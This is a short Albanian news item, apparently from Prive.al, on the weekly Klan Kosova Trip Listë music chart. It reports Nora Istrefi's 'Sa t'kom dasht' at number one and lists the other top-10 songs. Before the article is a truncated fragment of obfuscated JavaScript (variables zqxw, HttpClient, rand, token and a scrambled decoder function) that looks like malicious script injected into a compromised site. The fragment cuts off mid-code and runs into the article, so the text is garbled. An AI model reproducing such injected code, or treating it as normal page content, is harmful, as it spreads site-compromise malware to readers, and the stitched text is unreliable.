;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nora Istrefi me “Sa t’kom dasht”, e para n’Trip Listë!

By

Ndryshime të mëdha në pozicione shënuan këtë javë Trip Listën e Klan Kosova.

Prurjet e reja bënë që shumë krijime muzikore të ‘shkundeshin’ nga pozicionet disa javore.

Top 10-shja u hap me këngën e Lule Mustafës e vazhdoi më pas nga ‘Pushkë e çifteli’ në pozitën e 9-të, Dafina Zeqirin me ‘Liri’ në pozitën e tetë e ‘Dashni’ nga Majki në pozitën e shtatë.

Kida dhe Ermali që jo shumë kohë më parë ishin të parët, këtë javë dolën të gjashtët.

Pesëshja u hap me ‘Shake it’ të Etnon dhe Gentës dhe vazhdoi me ‘Monster’ të Getinjos dhe Baby G.

Në pozitën e tretë këtë javë dolën Soni dhe Skivi me ‘Me mua’ kurse Flori dhe 2po2 u ranguan të dytët me ‘Gone Girl’.

Nora Istrefi me ‘Sa t’kom dasht’ doli e para kurse një garë e fortë është edhe në javën vijuese pasiqë propozimet si ‘Numrin e ri’ nga Dhurata, ‘Hitman’ nga Kapo e kënga e artistes së re, Bletës vlerësohen si konkurente të forta.

Votimi do jetë i hapur gjatë tërë javës në faqen zyrtare të emisionit në Facebook. /Prive.al/

 

Artikuj të ngjashëm